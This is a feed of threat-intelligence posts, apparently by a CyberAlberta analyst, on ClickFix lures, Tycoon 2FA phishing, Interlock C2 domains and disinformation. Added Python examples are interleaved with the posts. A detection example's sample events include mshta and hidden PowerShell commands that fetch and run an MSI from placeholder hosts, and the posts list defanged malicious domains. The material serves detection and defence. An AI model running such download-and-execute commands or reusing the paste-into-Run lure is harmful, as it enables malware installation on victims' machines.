Recently discovered a webinar hosting platform actively scraping and redistributing public and private Zoom webinars without knowledge or consent of organizers.
Full details, recommendations, and detection opportunities here: cyberalberta.ca/zooming-out-...
#CTI #ThreatIntelligence #InfoSec
CyberAlberta's meta-analysis of the Shai-Hulud worm malware, and how it propagated throughout the npm ecosystem, pieces together the attack chain, detection opportunities, and guidance for maintainers and dependents of OSS packages.
cyberalberta.ca/the-scatteri...
#CTI #ThreatIntelligence #InfoSec
As Alberta moves to an uncertain future, with the possibility of a separatist vote looking ever more likely, the province could be a theatre to watch for researchers of influence operations.
CyberAlberta's latest strategic report covers the threat of #ElectionInterference, providing new findings of inauthentic accounts and news sites exploiting issues relevant to Alberta to antagonise the federal government.
cyberalberta.ca/system/files...
#CTI #ThreatIntelligence #InfoSec
CyberAlberta recently observed an attempted Vendor Email Compromise (VEC).
This highly convincing attack has been observed by the Irish Government, and researchers at Abnormal AI, who note high user engagement with this tactic.
cyberalberta.ca/the-evolving...
#CTI #ThreatIntel #InfoSec
The .es domains hosting the credential harvesting pages have a predictable regex pattern.
I've had success detecting hits with the following KQL. Only minor false positives that stick out quite easily so far.
DeviceNetworkEvents
| where RemoteUrl matches regex @"^[a-z0-9]{4,6}\.[a-z]{7,8}\.es$"
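The same regex detection, as an added Python example that is not part of the original post, run over a handful of constructed DeviceNetworkEvents-style rows. It normalises RemoteUrl to a bare hostname first (the anchored pattern only matches a hostname, and sensor fields sometimes carry a full URL) and adds a vowel-ratio triage flag, an assumed heuristic not in the post, so readable hits like the false positives the post mentions can be separated from generated-looking names. All hostnames below are made up, not indicators.

```python
import re
from urllib.parse import urlsplit

# Same pattern as the KQL in the post: a 4-6 character alphanumeric label,
# a 7-8 letter label, then the .es TLD.
ES_PATTERN = re.compile(r"^[a-z0-9]{4,6}\.[a-z]{7,8}\.es$")

# Constructed DeviceNetworkEvents-style rows for illustration only; the hosts
# are made up and are not real indicators.
SAMPLE_EVENTS = [
    {"DeviceName": "ws01", "RemoteUrl": "k3x9qp.zzzqwvbk.es"},
    {"DeviceName": "ws02", "RemoteUrl": "https://x7k2m.qwertyuo.es/login"},
    {"DeviceName": "ws03", "RemoteUrl": "portal.ministry.es"},  # regex hit, but readable: likely false positive
    {"DeviceName": "ws04", "RemoteUrl": "www.google.es"},
    {"DeviceName": "ws05", "RemoteUrl": "https://login.microsoftonline.com/"},
]


def extract_host(remote_url: str) -> str:
    """Reduce a RemoteUrl value to its lowercase hostname.

    The field sometimes carries a full URL and sometimes a bare hostname;
    the anchored regex only works on the hostname, so normalise first.
    """
    if "://" in remote_url:
        return (urlsplit(remote_url).hostname or "").lower()
    return remote_url.split("/", 1)[0].lower()


def vowel_ratio(label: str) -> float:
    """Share of vowels in a DNS label (assumed triage heuristic, not from the post).

    Very low ratios are typical of algorithmically generated labels.
    """
    if not label:
        return 0.0
    return sum(ch in "aeiou" for ch in label) / len(label)


def find_suspicious_es_hosts(events, random_threshold: float = 0.2):
    """Return regex hits with a flag separating generated-looking names from readable ones."""
    hits = []
    for ev in events:
        host = extract_host(ev["RemoteUrl"])
        if not ES_PATTERN.match(host):
            continue
        second_label = host.split(".")[1]
        ratio = vowel_ratio(second_label)
        hits.append({
            "device": ev["DeviceName"],
            "host": host,
            "vowel_ratio": round(ratio, 2),
            "likely_random": ratio < random_threshold,
        })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_es_hosts(SAMPLE_EVENTS):
        print(hit)
```

The regex stays identical to the KQL so results line up with the hunting query; the triage flag only orders review, it does not drop anything the query would surface.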
Senders:
- no-reply@campbell[.]edu
- no-reply@utah[.]edu
Subject: VN MSG[Timestamp] DURATION [MD5 HASH]
Attached HTML: Play_REC-Now[Username]Audio[MD5 HASH].html
Latest observed Tycoon 2FA campaign
At least 2 US based education organizations are spoofed to send HTML files masquerading as voicemail or invoices, directing targets to a pre-filled credential harvesting page hosted on DGA .es domains.
#ThreatIntelligence #CTI #InfoSec
Opening the search up to span April and May reveals that "Brenda Esparon" has been busy creating domains which:
- Use commonly abused root domains
- Often appear to be a DGA
- Impersonate financial sector organisations and other legitimate services
#ThreatIntelligence #CTI #InfoSec
Domains all created within the same day
doriot[.]info
asperod[.]tech
bkoegjtrihodetngpejfqsg[.]shop
cmbngotrndotnettktopvedeiob[.]shop
lolpendrev[.]info
maxcard[.]guru
Not enough to attribute these to Interlock, however, doriot[.]info has been detected on ThreatFox as FAKEUPDATES
Interlock hard-coded C2 domains
playiro[.]net
basiclock[.]cc
cluders[.]org
Show the following characteristics
Registrar: PDR
Registrant Name: "Brenda Esparon", or "REDACTED", or "None"
Created around: 1330 27/04/25
Pivoting on these data points in @silentpush.bsky.social reveals more.
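The registration-trait pivot described across the thread above (shared registrar, same or hidden registrant name, creation within a short window), as an added Python example that is not part of the original posts. The seed and candidate records, their domains and timestamps are constructed placeholders, and the scoring weights and 24-hour window are assumptions chosen for the example, not values from the thread.

```python
from datetime import datetime, timedelta

# Registrant values that hide rather than identify the registrant.
PLACEHOLDER_REGISTRANTS = {"redacted", "none", ""}

# Weights for each shared characteristic (assumed values for this example).
WEIGHTS = {
    "registrar": 1,
    "registrant": 2,         # same named registrant
    "registrant-hidden": 1,  # placeholder registrant: weaker signal
    "created-window": 1,
}

# Constructed records modelled on the traits in the thread. Domains and
# timestamps are hypothetical placeholders, not real registrations.
SEEDS = [
    {"domain": "seed-c2-1[.]example", "registrar": "PDR", "registrant": "Brenda Esparon", "created": "2025-04-27T13:30:00"},
    {"domain": "seed-c2-2[.]example", "registrar": "PDR", "registrant": "REDACTED", "created": "2025-04-27T13:31:00"},
]
POOL = [
    {"domain": "cand-a[.]example", "registrar": "PDR", "registrant": "Brenda Esparon", "created": "2025-04-27T15:10:00"},
    {"domain": "cand-b[.]example", "registrar": "PDR", "registrant": "None", "created": "2025-04-28T09:00:00"},
    {"domain": "cand-c[.]example", "registrar": "OtherRegistrar", "registrant": "Brenda Esparon", "created": "2025-03-01T10:00:00"},
    {"domain": "cand-d[.]example", "registrar": "PDR", "registrant": "Some Company", "created": "2025-04-27T13:45:00"},
    {"domain": "cand-e[.]example", "registrar": "PDR", "registrant": "brenda esparon", "created": "2025-04-27T13:50:00"},
]


def pivot_candidates(seeds, pool, window=timedelta(hours=24), min_score=3):
    """Score pool records by the registration traits they share with the seeds."""
    seed_domains = {s["domain"] for s in seeds}
    seed_registrars = {s["registrar"] for s in seeds}
    # Named registrants only; placeholders carry no identity to match on.
    seed_names = {s["registrant"].strip().lower() for s in seeds} - PLACEHOLDER_REGISTRANTS
    seed_times = [datetime.fromisoformat(s["created"]) for s in seeds]

    results = []
    for rec in pool:
        if rec["domain"] in seed_domains:
            continue
        reasons = []
        if rec["registrar"] in seed_registrars:
            reasons.append("registrar")
        name = rec["registrant"].strip().lower()
        if name in seed_names:
            reasons.append("registrant")
        elif name in PLACEHOLDER_REGISTRANTS:
            reasons.append("registrant-hidden")
        created = datetime.fromisoformat(rec["created"])
        if any(abs(created - t) <= window for t in seed_times):
            reasons.append("created-window")
        score = sum(WEIGHTS[r] for r in reasons)
        if score >= min_score:
            results.append({"domain": rec["domain"], "score": score, "reasons": reasons})
    # Highest score first; domain name breaks ties so output is stable.
    results.sort(key=lambda r: (-r["score"], r["domain"]))
    return results


if __name__ == "__main__":
    for row in pivot_candidates(SEEDS, POOL):
        print(row)
```

A single shared trait (registrar alone, or a hidden registrant alone) never clears the threshold, which mirrors the thread's caution that these traits are not enough on their own to attribute a domain.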
Great work as always.
Manipulating VIGINUM's content to undermine the French government is both shocking and entirely predictable at the same time.
Impersonating Microsoft applications and using Njalla for DNS? Smells like more RomCom. Nice find.
A recent spear phishing campaign leveraged Google Workspace to provide DKIM authentication to a maliciously crafted subdomain. This technique, combined with a misconfigured DMARC policy on the root domain increased delivery rates.
#ThreatIntelligence #CTI #InfoSec
cyberalberta.ca/spear-phishi...
Bots are already at the ballot box.
Ahead of the #2025CanadaElection, the DFRLab uncovered bot-like accounts on X spamming political content, mainly targeting the Liberal Party with recycled, false claims & signs of AI-driven amplification.
bit.ly/3YgjSD9
Pure revisionism. Krebs, and the rest of the team at CISA, worked to uphold the integrity of the 2020 US election. Not whatever on earth this "fact sheet" is claiming.
CyberAlberta's latest report analyzes recent #ClickFix infrastructure observed in the wild, and the subsequent attack chain, offering examples of what to look out for, and how to mitigate the impacts.
#ThreatIntelligence #CTI #InfoSec
cyberalberta.ca/human-verifi...
LotL isn't going anywhere. Our latest report highlights how these techniques were recently used to facilitate a recent ransomware deployment, including guidance on detecting and mitigating these all-too-common techniques.
cyberalberta.ca/ransomware-t...
#ThreatIntelligence #CTI #InfoSec #Ransomware
7/7 Alternatively, the following search in URLScan for all pages containing a redirect to caprofklfkzttripwith[.]com provides higher confidence domain results but will almost certainly be missing some.
urlscan.io/search/#doma...
Having said that, detecting mshta http is always a good idea anyway.
6/7 This will likely result in false positive domains, but confirming the ones that have been compromised seems to require looking for a clue in the HTML fields that corresponds to one of the domains listed.
I admit I may not know a better method.
5/7 The following Censys query can be used to find the IPs hosting domains that have been compromised by malicious code redirecting to the fake Cloudflare Turnstile JavaScript.
search.censys.io/search/repor...
4/7 A previous investigation shows the third-stage domain redirects to kdfmmikfkafjikmfikfjhm[.]com. And the MSI results in the deployment of #SectopRAT
www.inde.nz/blog/i-am-no...
Pivoting on this redirect revealed another downlfkzfoqkajada[.]com
3/7 The second-stage domain serviceauthfoap[.]com hosts an audio player, and launches invoke web request commands via PowerShell to the third-stage domain (ownlifeforyouwithme[.]com) to save and execute an MSI.
Pivoting on HTML elements revealed another second-stage domain serviceindustrverif[.]com
2/7 So far, all observed fake Cloudflare Turnstiles prompt the visitor (after two failed attempts at verification) to copy and paste the same hidden mshta http command into Run, establishing a connection to the second-stage domain.
1/7 Tracking a #ClickFix cluster mass compromising WordPress sites, injecting code which redirects from a first-stage domain to JavaScript producing fake Cloudflare Turnstiles hosted on caprofklfkzttripwith[.]com
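The two detection points the thread above calls out, mshta launched with a remote http URL (the pasted Run-dialog command) and PowerShell issuing a web request for the MSI, as an added Python example that is not part of the original thread. It scores constructed process-creation events, so the rule logic can be tried before porting it to a SIEM query. The `launched-from-run-dialog` and `powershell-child-of-mshta` checks are assumptions drawn from the chain the thread describes (command pasted into Run, so explorer.exe is the parent; mshta then spawning PowerShell); hostnames and command lines are placeholders, not the thread's indicators.

```python
import re

# mshta invoked with a remote http(s) URL on the command line.
MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?\b.*\bhttps?://", re.IGNORECASE)
# PowerShell fetching content via Invoke-WebRequest or its iwr alias.
PS_WEB_REQUEST = re.compile(
    r"\b(?:powershell|pwsh)(?:\.exe)?\b.*\b(?:invoke-webrequest|iwr)\b", re.IGNORECASE
)

# Constructed process-creation events; .example hostnames are placeholders,
# not the domains from the thread.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta http://second-stage.example/verify"},
    {"host": "ws02", "parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://third-stage.example/a.msi -OutFile $env:TEMP\\a.msi"'},
    {"host": "ws03", "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": r"mshta.exe C:\Windows\Temp\local.hta"},  # local HTA, no remote URL
    {"host": "ws04", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -c Get-Process"},               # benign PowerShell
]


def classify(event):
    """Return the names of the rules an event triggers (empty list if none)."""
    rules = []
    cmd = event["cmdline"]
    image = event["image"].lower()
    parent = event["parent"].lower()
    if MSHTA_REMOTE.search(cmd):
        rules.append("mshta-remote-url")
        # A command pasted into the Run dialog runs with explorer.exe as parent
        # (assumed context check, raises confidence that this is the lure).
        if parent == "explorer.exe":
            rules.append("launched-from-run-dialog")
    if PS_WEB_REQUEST.search(cmd):
        rules.append("powershell-web-request")
    # PowerShell spawned by mshta matches the second-to-third stage hop.
    if image in ("powershell.exe", "pwsh.exe") and parent == "mshta.exe":
        rules.append("powershell-child-of-mshta")
    return rules


def scan(events):
    """Return only the events that triggered at least one rule."""
    flagged = []
    for ev in events:
        rules = classify(ev)
        if rules:
            flagged.append({"host": ev["host"], "rules": rules})
    return flagged


if __name__ == "__main__":
    for row in scan(SAMPLE_EVENTS):
        print(row)
```

The mshta rule matches on the command line rather than the image name, so it still fires when the binary is renamed in the pasted command but the `http://` argument remains; the local-HTA event in the sample shows the rule staying quiet when no remote URL is present.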
Turns out, information manipulation is a real problem for Canada too.
Explore @dfrlab.bsky.social's review of Canada's 2025 Public Inquiry into Foreign Interference as we assess the potential impact of foreign interference on Canada's elections.
dfrlab.org/2025/03/19/c...
#CanadaElections2025
Fake Captcha / #ClickFix campaigns are switching up themes.
We're seeing campaigns beginning to impersonate #GoogleMeet, in addition to the usual fake #Zoom and Booking pages.
Stay safe, and don't paste code from any suspicious sites.
The Pravda network flooded the internet with 3.6 million pieces of pro-Kremlin propaganda in 2024 alone. This disinformation has already found its way into Artificial Intelligence, allowing dangerous lies to spread even faster. www.axios.com/2025/03/06/e...
"Pro-Kremlin Disinformation Ecosystem Targets Worldwide Audience" follows on from great research by @viginum.bsky.social & @dfrlab.bsky.social, analysing the latest iteration of Pravda's operation undermining the integrity of public opinion with disinformation.
cyberalberta.ca/pro-kremlin-...